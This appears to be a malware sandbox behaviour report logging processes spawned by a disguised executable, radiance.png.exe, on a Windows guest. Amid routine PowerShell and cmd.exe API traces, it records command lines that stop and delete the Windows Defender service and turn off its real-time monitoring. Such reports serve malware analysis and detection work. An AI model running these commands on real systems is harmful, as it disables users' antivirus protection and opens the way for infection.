Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\2XC7u663GxWc	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Desktop, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Desktop, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Desktop, type = file_attributes	3	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\2XC7u663GxWc	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn

Thread 0xdf0

Category	Operation	Information	Success	Count	Logfile
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe		1	Fn

Thread 0xe18

136

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	19	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	2	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 62	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 17	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 57	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 25	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 54	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data

Process #8: cmd.exe

Information	Value
ID	#8
File Name	c:\windows\system32\cmd.exe
Command Line	/c sc stop WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:45, Reason: Child Process
Unmonitor	End Time: 00:00:46, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0xeb8
Parent PID	0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x EBC

Threads

Thread 0xebc

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:21 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10896123	1	Fn
System	Get Time	type = Performance Ctr, time = 11918099119	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x49d60000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 200, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\sc.exe, os_pid = 0xed0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000005	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #9: sc.exe

Information	Value
ID	#9
File Name	c:\windows\system32\sc.exe
Command Line	sc stop WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:45, Reason: Child Process
Unmonitor	End Time: 00:00:46, Reason: Self Terminated
Monitor Duration	00:00:00

OS Process Information

Information	Value
PID	0xed0
Parent PID	0xeb8 (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x ED4 0x ED8

Threads

Thread 0xed4

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:21 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10896186	1	Fn
System	Get Time	type = Performance Ctr, time = 11924134033	1	Fn
Module	Get Handle	module_name = c:\windows\system32\sc.exe, base_address = 0xc50000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 51	1	Fn Data

Process #10: cmd.exe

Information	Value
ID	#10
File Name	c:\windows\system32\cmd.exe
Command Line	/c sc delete WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:46, Reason: Child Process
Unmonitor	End Time: 00:00:48, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

Information	Value
PID	0xedc
Parent PID	0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x EE0

Threads

Thread 0xee0

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:23 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10897559	1	Fn
System	Get Time	type = Performance Ctr, time = 12060860401	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a830000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 200, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\sc.exe, os_pid = 0xf14, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000005	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #11: cmd.exe

Information	Value
ID	#11
File Name	c:\windows\system32\cmd.exe
Command Line	/c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:46, Reason: Child Process
Unmonitor	End Time: 00:01:02, Reason: Self Terminated
Monitor Duration	00:00:16

OS Process Information

Information	Value
PID	0xeec
Parent PID	0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x EF0

Threads

Thread 0xef0

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:23 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10897340	1	Fn
System	Get Time	type = Performance Ctr, time = 12040302238	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a830000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 144, type = REG_NONE	1	Fn
